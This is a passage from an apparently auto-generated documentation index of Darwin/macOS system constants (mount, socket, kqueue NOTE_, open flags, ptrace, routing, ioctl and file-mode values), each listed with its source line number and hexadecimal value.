MNT_UNKNOWNPERMISSIONS = 0x200000 constant MNT_UPDATE (line 1016) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1017) | MNT_VISFLAGMASK = 0xd7f0f7ff constant MNT_WAIT (line 1018) | MNT_WAIT = 0x1 constant MSG_CTRUNC (line 1019) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1020) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1021) | MSG_DONTWAIT = 0x80 constant MSG_EOF (line 1022) | MSG_EOF = 0x100 constant MSG_EOR (line 1023) | MSG_EOR = 0x8 constant MSG_FLUSH (line 1024) | MSG_FLUSH = 0x400 constant MSG_HAVEMORE (line 1025) | MSG_HAVEMORE = 0x2000 constant MSG_HOLD (line 1026) | MSG_HOLD = 0x800 constant MSG_NEEDSA (line 1027) | MSG_NEEDSA = 0x10000 constant MSG_NOSIGNAL (line 1028) | MSG_NOSIGNAL = 0x80000 constant MSG_OOB (line 1029) | MSG_OOB = 0x1 constant MSG_PEEK (line 1030) | MSG_PEEK = 0x2 constant MSG_RCVMORE (line 1031) | MSG_RCVMORE = 0x4000 constant MSG_SEND (line 1032) | MSG_SEND = 0x1000 constant MSG_TRUNC (line 1033) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1034) | MSG_WAITALL = 0x40 constant MSG_WAITSTREAM (line 1035) | MSG_WAITSTREAM = 0x200 constant MS_ASYNC (line 1036) | MS_ASYNC = 0x1 constant MS_DEACTIVATE (line 1037) | MS_DEACTIVATE = 0x8 constant MS_INVALIDATE (line 1038) | MS_INVALIDATE = 0x2 constant MS_KILLPAGES (line 1039) | MS_KILLPAGES = 0x4 constant MS_SYNC (line 1040) | MS_SYNC = 0x10 constant NAME_MAX (line 1041) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1042) | NET_RT_DUMP = 0x1 constant NET_RT_DUMP2 (line 1043) | NET_RT_DUMP2 = 0x7 constant NET_RT_FLAGS (line 1044) | NET_RT_FLAGS = 0x2 constant NET_RT_FLAGS_PRIV (line 1045) | NET_RT_FLAGS_PRIV = 0xa constant NET_RT_IFLIST (line 1046) | NET_RT_IFLIST = 0x3 constant NET_RT_IFLIST2 (line 1047) | NET_RT_IFLIST2 = 0x6 constant NET_RT_MAXID (line 1048) | NET_RT_MAXID = 0xb constant NET_RT_STAT (line 1049) | NET_RT_STAT = 0x4 constant NET_RT_TRASH (line 1050) | NET_RT_TRASH = 0x5 constant NFDBITS (line 1051) | NFDBITS = 0x20 constant NL0 (line 1052) | NL0 = 0x0 constant NL1 (line 1053) | NL1 = 0x100 constant NL2 (line 1054) | NL2 = 0x200 constant NL3 (line 1055) | NL3 = 0x300 constant NLDLY (line 1056) | NLDLY = 0x300 constant NOFLSH (line 1057) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1058) | NOKERNINFO = 0x2000000 constant NOTE_ABSOLUTE (line 1059) | NOTE_ABSOLUTE = 0x8 constant NOTE_ATTRIB (line 1060) | NOTE_ATTRIB = 0x8 constant NOTE_BACKGROUND (line 1061) | NOTE_BACKGROUND = 0x40 constant NOTE_CHILD (line 1062) | NOTE_CHILD = 0x4 constant NOTE_CRITICAL (line 1063) | NOTE_CRITICAL = 0x20 constant NOTE_DELETE (line 1064) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1065) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1066) | NOTE_EXIT = 0x80000000 constant NOTE_EXITSTATUS (line 1067) | NOTE_EXITSTATUS = 0x4000000 constant NOTE_EXIT_CSERROR (line 1068) | NOTE_EXIT_CSERROR = 0x40000 constant NOTE_EXIT_DECRYPTFAIL (line 1069) | NOTE_EXIT_DECRYPTFAIL = 0x10000 constant NOTE_EXIT_DETAIL (line 1070) | NOTE_EXIT_DETAIL = 0x2000000 constant NOTE_EXIT_DETAIL_MASK (line 1071) | NOTE_EXIT_DETAIL_MASK = 0x70000 constant NOTE_EXIT_MEMORY (line 1072) | NOTE_EXIT_MEMORY = 0x20000 constant NOTE_EXIT_REPARENTED (line 1073) | NOTE_EXIT_REPARENTED = 0x80000 constant NOTE_EXTEND (line 1074) | NOTE_EXTEND = 0x4 constant NOTE_FFAND (line 1075) | NOTE_FFAND = 0x40000000 constant NOTE_FFCOPY (line 1076) | NOTE_FFCOPY = 0xc0000000 constant NOTE_FFCTRLMASK (line 1077) | NOTE_FFCTRLMASK = 0xc0000000 constant NOTE_FFLAGSMASK (line 1078) | NOTE_FFLAGSMASK = 0xffffff constant NOTE_FFNOP (line 1079) | NOTE_FFNOP = 0x0 constant NOTE_FFOR (line 1080) | NOTE_FFOR = 0x80000000 constant NOTE_FORK (line 1081) | NOTE_FORK = 0x40000000 constant NOTE_FUNLOCK (line 1082) | NOTE_FUNLOCK = 0x100 constant NOTE_LEEWAY (line 1083) | NOTE_LEEWAY = 0x10 constant NOTE_LINK (line 1084) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1085) | NOTE_LOWAT = 0x1 constant NOTE_MACHTIME (line 1086) | NOTE_MACHTIME = 0x100 constant NOTE_MACH_CONTINUOUS_TIME (line 1087) | NOTE_MACH_CONTINUOUS_TIME = 0x80 constant NOTE_NONE (line 1088) | NOTE_NONE = 0x80 constant NOTE_NSECONDS (line 1089) | NOTE_NSECONDS = 0x4 constant NOTE_OOB (line 1090) | NOTE_OOB = 0x2 constant NOTE_PCTRLMASK (line 1091) | NOTE_PCTRLMASK = -0x100000 constant NOTE_PDATAMASK (line 1092) | NOTE_PDATAMASK = 0xfffff constant NOTE_REAP (line 1093) | NOTE_REAP = 0x10000000 constant NOTE_RENAME (line 1094) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1095) | NOTE_REVOKE = 0x40 constant NOTE_SECONDS (line 1096) | NOTE_SECONDS = 0x1 constant NOTE_SIGNAL (line 1097) | NOTE_SIGNAL = 0x8000000 constant NOTE_TRACK (line 1098) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1099) | NOTE_TRACKERR = 0x2 constant NOTE_TRIGGER (line 1100) | NOTE_TRIGGER = 0x1000000 constant NOTE_USECONDS (line 1101) | NOTE_USECONDS = 0x2 constant NOTE_VM_ERROR (line 1102) | NOTE_VM_ERROR = 0x10000000 constant NOTE_VM_PRESSURE (line 1103) | NOTE_VM_PRESSURE = 0x80000000 constant NOTE_VM_PRESSURE_SUDDEN_TERMINATE (line 1104) | NOTE_VM_PRESSURE_SUDDEN_TERMINATE = 0x20000000 constant NOTE_VM_PRESSURE_TERMINATE (line 1105) | NOTE_VM_PRESSURE_TERMINATE = 0x40000000 constant NOTE_WRITE (line 1106) | NOTE_WRITE = 0x2 constant OCRNL (line 1107) | OCRNL = 0x10 constant OFDEL (line 1108) | OFDEL = 0x20000 constant OFILL (line 1109) | OFILL = 0x80 constant ONLCR (line 1110) | ONLCR = 0x2 constant ONLRET (line 1111) | ONLRET = 0x40 constant ONOCR (line 1112) | ONOCR = 0x20 constant ONOEOT (line 1113) | ONOEOT = 0x8 constant OPOST (line 1114) | OPOST = 0x1 constant OXTABS (line 1115) | OXTABS = 0x4 constant O_ACCMODE (line 1116) | O_ACCMODE = 0x3 constant O_ALERT (line 1117) | O_ALERT = 0x20000000 constant O_APPEND (line 1118) | O_APPEND = 0x8 constant O_ASYNC (line 1119) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1120) | O_CLOEXEC = 0x1000000 constant O_CREAT (line 1121) | O_CREAT = 0x200 constant O_DIRECTORY (line 1122) | O_DIRECTORY = 0x100000 constant O_DP_GETRAWENCRYPTED (line 1123) | O_DP_GETRAWENCRYPTED = 0x1 constant O_DP_GETRAWUNENCRYPTED (line 1124) | O_DP_GETRAWUNENCRYPTED = 0x2 constant O_DSYNC (line 1125) | O_DSYNC = 0x400000 constant O_EVTONLY (line 1126) | O_EVTONLY = 0x8000 constant O_EXCL (line 1127) | O_EXCL = 0x800 constant O_EXLOCK (line 1128) | O_EXLOCK = 0x20 constant O_FSYNC (line 1129) | O_FSYNC = 0x80 constant O_NDELAY (line 1130) | O_NDELAY = 0x4 constant O_NOCTTY (line 1131) | O_NOCTTY = 0x20000 constant O_NOFOLLOW (line 1132) | O_NOFOLLOW = 0x100 constant O_NOFOLLOW_ANY (line 1133) | O_NOFOLLOW_ANY = 0x20000000 constant O_NONBLOCK (line 1134) | O_NONBLOCK = 0x4 constant O_POPUP (line 1135) | O_POPUP = 0x80000000 constant O_RDONLY (line 1136) | O_RDONLY = 0x0 constant O_RDWR (line 1137) | O_RDWR = 0x2 constant O_SHLOCK (line 1138) | O_SHLOCK = 0x10 constant O_SYMLINK (line 1139) | O_SYMLINK = 0x200000 constant O_SYNC (line 1140) | O_SYNC = 0x80 constant O_TRUNC (line 1141) | O_TRUNC = 0x400 constant O_WRONLY (line 1142) | O_WRONLY = 0x1 constant PARENB (line 1143) | PARENB = 0x1000 constant PARMRK (line 1144) | PARMRK = 0x8 constant PARODD (line 1145) | PARODD = 0x2000 constant PENDIN (line 1146) | PENDIN = 0x20000000 constant PRIO_PGRP (line 1147) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1148) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1149) | PRIO_USER = 0x2 constant PROT_EXEC (line 1150) | PROT_EXEC = 0x4 constant PROT_NONE (line 1151) | PROT_NONE = 0x0 constant PROT_READ (line 1152) | PROT_READ = 0x1 constant PROT_WRITE (line 1153) | PROT_WRITE = 0x2 constant PT_ATTACH (line 1154) | PT_ATTACH = 0xa constant PT_ATTACHEXC (line 1155) | PT_ATTACHEXC = 0xe constant PT_CONTINUE (line 1156) | PT_CONTINUE = 0x7 constant PT_DENY_ATTACH (line 1157) | PT_DENY_ATTACH = 0x1f constant PT_DETACH (line 1158) | PT_DETACH = 0xb constant PT_FIRSTMACH (line 1159) | PT_FIRSTMACH = 0x20 constant PT_FORCEQUOTA (line 1160) | PT_FORCEQUOTA = 0x1e constant PT_KILL (line 1161) | PT_KILL = 0x8 constant PT_READ_D (line 1162) | PT_READ_D = 0x2 constant PT_READ_I (line 1163) | PT_READ_I = 0x1 constant PT_READ_U (line 1164) | PT_READ_U = 0x3 constant PT_SIGEXC (line 1165) | PT_SIGEXC = 0xc constant PT_STEP (line 1166) | PT_STEP = 0x9 constant PT_THUPDATE (line 1167) | PT_THUPDATE = 0xd constant PT_TRACE_ME (line 1168) | PT_TRACE_ME = 0x0 constant PT_WRITE_D (line 1169) | PT_WRITE_D = 0x5 constant PT_WRITE_I (line 1170) | PT_WRITE_I = 0x4 constant PT_WRITE_U (line 1171) | PT_WRITE_U = 0x6 constant RLIMIT_AS (line 1172) | RLIMIT_AS = 0x5 constant RLIMIT_CORE (line 1173) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1174) | RLIMIT_CPU = 0x0 constant RLIMIT_CPU_USAGE_MONITOR (line 1175) | RLIMIT_CPU_USAGE_MONITOR = 0x2 constant RLIMIT_DATA (line 1176) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1177) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1178) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1179) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1180) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1181) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1182) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1183) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1184) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1185) | RTAX_BRD = 0x7 constant RTAX_DST (line 1186) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1187) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1188) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1189) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1190) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1191) | RTAX_MAX = 0x8 constant RTAX_NETMASK (line 1192) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 1193) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1194) | RTA_BRD = 0x80 constant RTA_DST (line 1195) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1196) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1197) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1198) | RTA_IFA = 0x20 constant RTA_IFP (line 1199) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1200) | RTA_NETMASK = 0x4 constant RTF_BLACKHOLE (line 1201) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1202) | RTF_BROADCAST = 0x400000 constant RTF_CLONING (line 1203) | RTF_CLONING = 0x100 constant RTF_CONDEMNED (line 1204) | RTF_CONDEMNED = 0x2000000 constant RTF_DEAD (line 1205) | RTF_DEAD = 0x20000000 constant RTF_DELCLONE (line 1206) | RTF_DELCLONE = 0x80 constant RTF_DONE (line 1207) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1208) | RTF_DYNAMIC = 0x10 constant RTF_GATEWAY (line 1209) | RTF_GATEWAY = 0x2 constant RTF_GLOBAL (line 1210) | RTF_GLOBAL = 0x40000000 constant RTF_HOST (line 1211) | RTF_HOST = 0x4 constant RTF_IFREF (line 1212) | RTF_IFREF = 0x4000000 constant RTF_IFSCOPE (line 1213) | RTF_IFSCOPE = 0x1000000 constant RTF_LLDATA (line 1214) | RTF_LLDATA = 0x400 constant RTF_LLINFO (line 1215) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1216) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1217) | RTF_MODIFIED = 0x20 constant RTF_MULTICAST (line 1218) | RTF_MULTICAST = 0x800000 constant RTF_NOIFREF (line 1219) | RTF_NOIFREF = 0x2000 constant RTF_PINNED (line 1220) | RTF_PINNED = 0x100000 constant RTF_PRCLONING (line 1221) | RTF_PRCLONING = 0x10000 constant RTF_PROTO1 (line 1222) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1223) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1224) | RTF_PROTO3 = 0x40000 constant RTF_PROXY (line 1225) | RTF_PROXY = 0x8000000 constant RTF_REJECT (line 1226) | RTF_REJECT = 0x8 constant RTF_ROUTER (line 1227) | RTF_ROUTER = 0x10000000 constant RTF_STATIC (line 1228) | RTF_STATIC = 0x800 constant RTF_UP (line 1229) | RTF_UP = 0x1 constant RTF_WASCLONED (line 1230) | RTF_WASCLONED = 0x20000 constant RTF_XRESOLVE (line 1231) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1232) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1233) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 1234) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1235) | RTM_DELETE = 0x2 constant RTM_DELMADDR (line 1236) | RTM_DELMADDR = 0x10 constant RTM_GET (line 1237) | RTM_GET = 0x4 constant RTM_GET2 (line 1238) | RTM_GET2 = 0x14 constant RTM_IFINFO (line 1239) | RTM_IFINFO = 0xe constant RTM_IFINFO2 (line 1240) | RTM_IFINFO2 = 0x12 constant RTM_LOCK (line 1241) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1242) | RTM_LOSING = 0x5 constant RTM_MISS (line 1243) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1244) | RTM_NEWADDR = 0xc constant RTM_NEWMADDR (line 1245) | RTM_NEWMADDR = 0xf constant RTM_NEWMADDR2 (line 1246) | RTM_NEWMADDR2 = 0x13 constant RTM_OLDADD (line 1247) | RTM_OLDADD = 0x9 constant RTM_OLDDEL (line 1248) | RTM_OLDDEL = 0xa constant RTM_REDIRECT (line 1249) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1250) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1251) | RTM_RTTUNIT = 0xf4240 constant RTM_VERSION (line 1252) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1253) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1254) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1255) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1256) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1257) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1258) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1259) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1260) | RTV_SSTHRESH = 0x20 constant RUSAGE_CHILDREN (line 1261) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1262) | RUSAGE_SELF = 0x0 constant SCM_CREDS (line 1263) | SCM_CREDS = 0x3 constant SCM_RIGHTS (line 1264) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1265) | SCM_TIMESTAMP = 0x2 constant SCM_TIMESTAMP_MONOTONIC (line 1266) | SCM_TIMESTAMP_MONOTONIC = 0x4 constant SEEK_CUR (line 1267) | SEEK_CUR = 0x1 constant SEEK_DATA (line 1268) | SEEK_DATA = 0x4 constant SEEK_END (line 1269) | SEEK_END = 0x2 constant SEEK_HOLE (line 1270) | SEEK_HOLE = 0x3 constant SEEK_SET (line 1271) | SEEK_SET = 0x0 constant SF_APPEND (line 1272) | SF_APPEND = 0x40000 constant SF_ARCHIVED (line 1273) | SF_ARCHIVED = 0x10000 constant SF_DATALESS (line 1274) | SF_DATALESS = 0x40000000 constant SF_FIRMLINK (line 1275) | SF_FIRMLINK = 0x800000 constant SF_IMMUTABLE (line 1276) | SF_IMMUTABLE = 0x20000 constant SF_NOUNLINK (line 1277) | SF_NOUNLINK = 0x100000 constant SF_RESTRICTED (line 1278) | SF_RESTRICTED = 0x80000 constant SF_SETTABLE (line 1279) | SF_SETTABLE = 0x3fff0000 constant SF_SUPPORTED (line 1280) | SF_SUPPORTED = 0x9f0000 constant SF_SYNTHETIC (line 1281) | SF_SYNTHETIC = 0xc0000000 constant SHUT_RD (line 1282) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1283) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1284) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1285) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1286) | SIOCAIFADDR = 0x8040691a constant SIOCARPIPLL (line 1287) | SIOCARPIPLL = 0xc0206928 constant SIOCATMARK (line 1288) | SIOCATMARK = 0x40047307 constant SIOCAUTOADDR (line 1289) | SIOCAUTOADDR = 0xc0206926 constant SIOCAUTONETMASK (line 1290) | SIOCAUTONETMASK = 0x80206927 constant SIOCDELMULTI (line 1291) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1292) | SIOCDIFADDR = 0x80206919 constant SIOCDIFPHYADDR (line 1293) | SIOCDIFPHYADDR = 0x80206941 constant SIOCGDRVSPEC (line 1294) | SIOCGDRVSPEC = 0xc028697b constant SIOCGETVLAN (line 1295) | SIOCGETVLAN = 0xc020697f constant SIOCGHIWAT (line 1296) | SIOCGHIWAT = 0x40047301 constant SIOCGIF6LOWPAN (line 1297) | SIOCGIF6LOWPAN = 0xc02069c5 constant SIOCGIFADDR (line 1298) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFALTMTU (line 1299) | SIOCGIFALTMTU = 0xc0206948 constant SIOCGIFASYNCMAP (line 1300) | SIOCGIFASYNCMAP = 0xc020697c constant SIOCGIFBOND (line 1301) | SIOCGIFBOND = 0xc0206947 constant SIOCGIFBRDADDR (line 1302) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCAP (line 1303) | SIOCGIFCAP = 0xc020695b constant SIOCGIFCONF (line 1304) | SIOCGIFCONF = 0xc00c6924 constant SIOCGIFDEVMTU (line 1305) | SIOCGIFDEVMTU = 0xc0206944 constant SIOCGIFDSTADDR (line 1306) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1307) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFFUNCTIONALTYPE (line 1308) | SIOCGIFFUNCTIONALTYPE = 0xc02069ad constant SIOCGIFGENERIC (line 1309) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFKPI (line 1310) | SIOCGIFKPI = 0xc0206987 constant SIOCGIFMAC (line 1311) | SIOCGIFMAC = 0xc0206982 constant SIOCGIFMEDIA (line 1312) | SIOCGIFMEDIA = 0xc02c6938 constant SIOCGIFMETRIC (line 1313) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1314) | SIOCGIFMTU = 0xc0206933 constant SIOCGIFNETMASK (line 1315) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPDSTADDR (line 1316) | SIOCGIFPDSTADDR = 0xc0206940 constant SIOCGIFPHYS (line 1317) | SIOCGIFPHYS = 0xc0206935 constant SIOCGIFPSRCADDR (line 1318) | SIOCGIFPSRCADDR = 0xc020693f constant SIOCGIFSTATUS (line 1319) | SIOCGIFSTATUS = 0xc331693d constant SIOCGIFVLAN (line 1320) | SIOCGIFVLAN = 0xc020697f constant SIOCGIFWAKEFLAGS (line 1321) | SIOCGIFWAKEFLAGS = 0xc0206988 constant SIOCGIFXMEDIA (line 1322) | SIOCGIFXMEDIA = 0xc02c6948 constant SIOCGLOWAT (line 1323) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1324) | SIOCGPGRP = 0x40047309 constant SIOCIFCREATE (line 1325) | SIOCIFCREATE = 0xc0206978 constant SIOCIFCREATE2 (line 1326) | SIOCIFCREATE2 = 0xc020697a constant SIOCIFDESTROY (line 1327) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1328) | SIOCIFGCLONERS = 0xc0106981 constant SIOCRSLVMULTI (line 1329) | SIOCRSLVMULTI = 0xc010693b constant SIOCSDRVSPEC (line 1330) | SIOCSDRVSPEC = 0x8028697b constant SIOCSETVLAN (line 1331) | SIOCSETVLAN = 0x8020697e constant SIOCSHIWAT (line 1332) | SIOCSHIWAT = 0x80047300 constant SIOCSIF6LOWPAN (line 1333) | SIOCSIF6LOWPAN = 0x802069c4 constant SIOCSIFADDR (line 1334) | SIOCSIFADDR = 0x8020690c constant SIOCSIFALTMTU (line 1335) | SIOCSIFALTMTU = 0x80206945 constant SIOCSIFASYNCMAP (line 1336) | SIOCSIFASYNCMAP = 0x8020697d constant SIOCSIFBOND (line 1337) | SIOCSIFBOND = 0x80206946 constant SIOCSIFBRDADDR (line 1338) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFCAP (line 1339) | SIOCSIFCAP = 0x8020695a constant SIOCSIFDSTADDR (line 1340) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1341) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGENERIC (line 1342) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFKPI (line 1343) | SIOCSIFKPI = 0x80206986 constant SIOCSIFLLADDR (line 1344) | SIOCSIFLLADDR = 0x8020693c constant SIOCSIFMAC (line 1345) | SIOCSIFMAC = 0x80206983 constant SIOCSIFMEDIA (line 1346) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1347) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1348) | SIOCSIFMTU = 0x80206934 constant SIOCSIFNETMASK (line 1349) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPHYADDR (line 1350) | SIOCSIFPHYADDR = 0x8040693e constant SIOCSIFPHYS (line 1351) | SIOCSIFPHYS = 0x80206936 constant SIOCSIFVLAN (line 1352) | SIOCSIFVLAN = 0x8020697e constant SIOCSLOWAT (line 1353) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1354) | SIOCSPGRP = 0x80047308 constant SOCK_DGRAM (line 1355) | SOCK_DGRAM = 0x2 constant SOCK_MAXADDRLEN (line 1356) | SOCK_MAXADDRLEN = 0xff constant SOCK_RAW (line 1357) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1358) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1359) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1360) | SOCK_STREAM = 0x1 constant SOL_LOCAL (line 1361) | SOL_LOCAL = 0x0 constant SOL_SOCKET (line 1362) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1363) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1364) | SO_ACCEPTCONN = 0x2 constant SO_BROADCAST (line 1365) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1366) | SO_DEBUG = 0x1 constant SO_DONTROUTE (line 1367) | SO_DONTROUTE = 0x10 constant SO_DONTTRUNC (line 1368) | SO_DONTTRUNC = 0x2000 constant SO_ERROR (line 1369) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1370) | SO_KEEPALIVE = 0x8 constant SO_LABEL (line 1371) | SO_LABEL = 0x1010 constant SO_LINGER (line 1372) | SO_LINGER = 0x80 constant SO_LINGER_SEC (line 1373) | SO_LINGER_SEC = 0x1080 constant SO_NETSVC_MARKING_LEVEL (line 1374) | SO_NETSVC_MARKING_LEVEL = 0x1119 constant SO_NET_SERVICE_TYPE (line 1375) | SO_NET_SERVICE_TYPE = 0x1116 constant SO_NKE (line 1376) | SO_NKE = 0x1021 constant SO_NOADDRERR (line 1377) | SO_NOADDRERR = 0x1023 constant SO_NOSIGPIPE (line 1378) | SO_NOSIGPIPE = 0x1022 constant SO_NOTIFYCONFLICT (line 1379) | SO_NOTIFYCONFLICT = 0x1026 constant SO_NP_EXTENSIONS (line 1380) | SO_NP_EXTENSIONS = 0x1083 constant SO_NREAD (line 1381) | SO_NREAD = 0x1020 constant SO_NUMRCVPKT (line 1382) | SO_NUMRCVPKT = 0x1112 constant SO_NWRITE (line 1383) | SO_NWRITE = 0x1024 constant SO_OOBINLINE (line 1384) | SO_OOBINLINE = 0x100 constant SO_PEERLABEL (line 1385) | SO_PEERLABEL = 0x1011 constant SO_RANDOMPORT (line 1386) | SO_RANDOMPORT = 0x1082 constant SO_RCVBUF (line 1387) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1388) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1389) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 1390) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1391) | SO_REUSEPORT = 0x200 constant SO_REUSESHAREUID (line 1392) | SO_REUSESHAREUID = 0x1025 constant SO_SNDBUF (line 1393) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1394) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1395) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMP (line 1396) | SO_TIMESTAMP = 0x400 constant SO_TIMESTAMP_MONOTONIC (line 1397) | SO_TIMESTAMP_MONOTONIC = 0x800 constant SO_TRACKER_ATTRIBUTE_FLAGS_APP_APPROVED (line 1398) | SO_TRACKER_ATTRIBUTE_FLAGS_APP_APPROVED = 0x1 constant SO_TRACKER_ATTRIBUTE_FLAGS_DOMAIN_SHORT (line 1399) | SO_TRACKER_ATTRIBUTE_FLAGS_DOMAIN_SHORT = 0x4 constant SO_TRACKER_ATTRIBUTE_FLAGS_TRACKER (line 1400) | SO_TRACKER_ATTRIBUTE_FLAGS_TRACKER = 0x2 constant SO_TRACKER_TRANSPARENCY_VERSION (line 1401) | SO_TRACKER_TRANSPARENCY_VERSION = 0x3 constant SO_TYPE (line 1402) | SO_TYPE = 0x1008 constant SO_UPCALLCLOSEWAIT (line 1403) | SO_UPCALLCLOSEWAIT = 0x1027 constant SO_USELOOPBACK (line 1404) | SO_USELOOPBACK = 0x40 constant SO_WANTMORE (line 1405) | SO_WANTMORE = 0x4000 constant SO_WANTOOBFLAG (line 1406) | SO_WANTOOBFLAG = 0x8000 constant S_IEXEC (line 1407) | S_IEXEC = 0x40 constant S_IFBLK (line 1408) | S_IFBLK = 0x6000 constant S_IFCHR (line 1409) | S_IFCHR = 0x2000 constant S_IFDIR (line 1410) | S_IFDIR = 0x4000 constant S_IFIFO (line 1411) | S_IFIFO = 0x1000 constant S_IFLNK (line 1412) | S_IFLNK = 0xa000 constant S_IFMT (line 1413) | S_IFMT = 0xf000 constant S_IFREG (line 1414) | S_IFREG = 0x8000 constant S_IFSOCK (line 1415) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1416) | S_IFWHT = 0xe000 constant S_IREAD (line 1417) | S_IREAD = 0x100 constant S_IRGRP (line 1418) | S_IRGRP = 0x20 constant S_IROTH (line 1419) | S_IROTH = 0x4 constant S_IRUSR (line 1420) | S_IRUSR = 0x100 constant S_IRWXG (line 1421) | S_IRWXG = 0x38 constant S_IRWXO (line 1422) | S_IRWXO = 0x7 constant S_IRWXU (line 1423) | S_IRWXU = 0x1c0 constant S_ISGID (line 1424) | S_ISGID = 0x400 constant S_ISTXT (line 1425) | S_ISTXT = 0x200 constant S_ISUID (line 1426) | S_ISUID = 0x800 constant S_ISVTX (line 1427) | S_ISVTX = 0x200 constant S_IWGRP (line 1428) | S_IWGRP = 0x10 constant S_IWOTH (line 1429) | S_IWOTH = 0x2 constant S_IWRITE (line 1430) | S_IWRITE = 0x80 constant S_IWUSR (line 1431) | S_IWUSR = 0x80 constant S_IXGRP (line 1432) | S_IXGRP = 0x8 constant S_IXOTH (line 1433) | S_IXOTH = 0x1 constant S_IXUSR (line 1434) | S_IXUSR = 0x40 constant TAB0 (line 1435) | TAB0 = 0x0 constant TAB1 (line 1436) | 